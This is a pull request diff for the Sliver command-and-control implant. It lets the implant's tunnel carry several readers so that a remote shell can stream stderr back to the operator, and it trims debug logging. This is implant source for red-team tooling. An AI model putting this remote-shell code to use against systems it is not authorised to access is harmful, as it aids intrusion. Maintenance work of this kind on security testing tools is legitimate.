### PR TITLE
Support multiple `io.ReadCloser` in `transports.Tunnel`

### DIFF
--- a/client/command/generate/generate.go
+++ b/client/command/generate/generate.go
@@ -164,7 +164,7 @@ func nameOfOutputFormat(value clientpb.OutputFormat) string {
 // Shared function that extracts the compile flags from the grumble context
 func parseCompileFlags(ctx *grumble.Context, con *console.SliverConsoleClient) *clientpb.ImplantConfig {
 	var name string
-	if ctx.Flags["name"] != nil {
+	if ctx.Flags.String("name") != "" {
 		name = strings.ToLower(ctx.Flags.String("name"))
 
 		if err := util.AllowedName(name); err != nil {

--- a/implant/sliver/handlers/tunnel_handlers/close_handler.go
+++ b/implant/sliver/handlers/tunnel_handlers/close_handler.go
@@ -22,8 +22,7 @@ func TunnelCloseHandler(envelope *sliverpb.Envelope, connection *transports.Conn
 		log.Printf("[tunnel] Closing tunnel with id %d", tunnel.ID)
 		// {{end}}
 		connection.RemoveTunnel(tunnel.ID)
-		tunnel.Reader.Close()
-		tunnel.Writer.Close()
+		tunnel.Close() // Call tunnel.Close instead of individually closing each Reader/Writer here
 		tunnelDataCache.DeleteTun(tunnel.ID)
 	} else {
 		// {{if .Config.Debug}}

--- a/implant/sliver/handlers/tunnel_handlers/portfwd_handler.go
+++ b/implant/sliver/handlers/tunnel_handlers/portfwd_handler.go
@@ -114,7 +114,8 @@ func PortfwdReqHandler(envelope *sliverpb.Envelope, connection *transports.Conne
 			tun:  tunnel,
 			conn: connection,
 		}
-		n, err := io.Copy(tWriter, tunnel.Reader)
+		// portfwd only uses one reader, hence the tunnel.Readers[0]
+		n, err := io.Copy(tWriter, tunnel.Readers[0])
 		_ = n // avoid not used compiler error if debug mode is disabled
 		// {{if .Config.Debug}}
 		log.Printf("[tunnel] Tunnel done, wrote %v bytes", n)

--- a/implant/sliver/handlers/tunnel_handlers/tunnel_writer.go
+++ b/implant/sliver/handlers/tunnel_handlers/tunnel_writer.go
@@ -27,7 +27,7 @@ func (tw tunnelWriter) Write(data []byte) (int, error) {
 		Data:     data,
 	})
 	// {{if .Config.Debug}}
-	log.Printf("[tunnelWriter] Write %d bytes (write seq: %d) ack: %d, data: %s", n, tw.tun.WriteSequence(), tw.tun.ReadSequence(), data)
+	log.Printf("[tunnelWriter] Write %d bytes (write seq: %d) ack: %d", n, tw.tun.WriteSequence(), tw.tun.ReadSequence())
 	// {{end}}
 	tw.tun.IncWriteSequence() // Increment write sequence
 	tw.conn.Send <- &sliverpb.Envelope{

--- a/implant/sliver/shell/shell-pty.go
+++ b/implant/sliver/shell/shell-pty.go
@@ -77,6 +77,15 @@ func pipedShell(tunnelID uint64, command []string) (*Shell, error) {
 		return nil, err
 	}
 
+	stderr, err := cmd.StderrPipe()
+	if err != nil {
+		// {{if .Config.Debug}}
+		log.Printf("[shell] stderr pipe failed\n")
+		// {{end}}
+		cancel()
+		return nil, err
+	}
+
 	err = cmd.Start()
 
 	return &Shell{
@@ -84,6 +93,7 @@ func pipedShell(tunnelID uint64, command []string) (*Shell, error) {
 		Command: cmd,
 		Stdout:  stdout,
 		Stdin:   stdin,
+		Stderr:  stderr,
 		Cancel:  cancel,
 	}, err
 }

--- a/implant/sliver/shell/shell.go
+++ b/implant/sliver/shell/shell.go
@@ -31,6 +31,7 @@ type Shell struct {
 	Command *exec.Cmd
 	Stdout  io.ReadCloser
 	Stdin   io.WriteCloser
+	Stderr  io.ReadCloser
 	Cancel  context.CancelFunc
 }
 

--- a/implant/sliver/shell/shell_generic.go
+++ b/implant/sliver/shell/shell_generic.go
@@ -72,11 +72,21 @@ func pipedShell(tunnelID uint64, command []string) (*Shell, error) {
 		return nil, err
 	}
 
+	stderr, err := cmd.StderrPipe()
+	if err != nil {
+		// {{if .Config.Debug}}
+		log.Printf("[shell] stderr pipe failed\n")
+		// {{end}}
+		cancel()
+		return nil, err
+	}
+
 	return &Shell{
 		ID:      tunnelID,
 		Command: cmd,
 		Stdout:  stdout,
 		Stdin:   stdin,
+		Stderr:  stderr,
 		Cancel:  cancel,
 	}, nil
 }

--- a/implant/sliver/shell/shell_windows.go
+++ b/implant/sliver/shell/shell_windows.go
@@ -95,6 +95,15 @@ func pipedShell(tunnelID uint64, command []string) (*Shell, error) {
 		return nil, err
 	}
 
+	stderr, err := cmd.StderrPipe()
+	if err != nil {
+		// {{if .Config.Debug}}
+		log.Printf("[shell] stderr pipe failed\n")
+		// {{end}}
+		cancel()
+		return nil, err
+	}
+
 	err = cmd.Start()
 
 	return &Shell{
@@ -102,6 +111,7 @@ func pipedShell(tunnelID uint64, command []string) (*Shell, error) {
 		Command: cmd,
 		Stdout:  stdout,
 		Stdin:   stdin,
+		Stderr:  stderr,
 		Cancel:  cancel,
 	}, err
 }

--- a/implant/sliver/transports/session.go
+++ b/implant/sliver/transports/session.go
@@ -253,9 +253,6 @@ func mtlsConnect(uri *url.URL) (*Connection, error) {
 					if !ok {
 						return
 					}
-					// {{if .Config.Debug}}
-					log.Printf("TRANSPORT MESSAGE: type (%d) - %s", envelope.Type, envelope.Data)
-					// {{end}}
 					err := mtls.WriteEnvelope(conn, envelope)
 					if err != nil {
 						return

--- a/implant/sliver/transports/tunnel.go
+++ b/implant/sliver/transports/tunnel.go
@@ -9,7 +9,8 @@ import (
 type Tunnel struct {
 	ID uint64
 
-	Reader       io.ReadCloser
+	// Reader       io.ReadCloser
+	Readers      []io.ReadCloser
 	readSequence uint64
 
 	Writer        io.WriteCloser
@@ -18,12 +19,12 @@ type Tunnel struct {
 	mutex *sync.RWMutex
 }
 
-func NewTunnel(id uint64, reader io.ReadCloser, writer io.WriteCloser) *Tunnel {
+func NewTunnel(id uint64, writer io.WriteCloser, readers ...io.ReadCloser) *Tunnel {
 	return &Tunnel{
-		ID:     id,
-		Reader: reader,
-		Writer: writer,
-		mutex:  &sync.RWMutex{},
+		ID:      id,
+		Readers: readers,
+		Writer:  writer,
+		mutex:   &sync.RWMutex{},
 	}
 }
 
@@ -57,6 +58,8 @@ func (c *Tunnel) IncWriteSequence() {
 
 // Close - close tunnel reader and writer
 func (c *Tunnel) Close() {
-	c.Reader.Close()
+	for _, rc := range c.Readers {
+		rc.Close()
+	}
 	c.Writer.Close()
 }


### PR DESCRIPTION
This PR adds support for multiple `io.ReadCloser` in `transports.Tunnel`, allowing us to stream back data from multiple source through a tunnel. This PR will fix #736.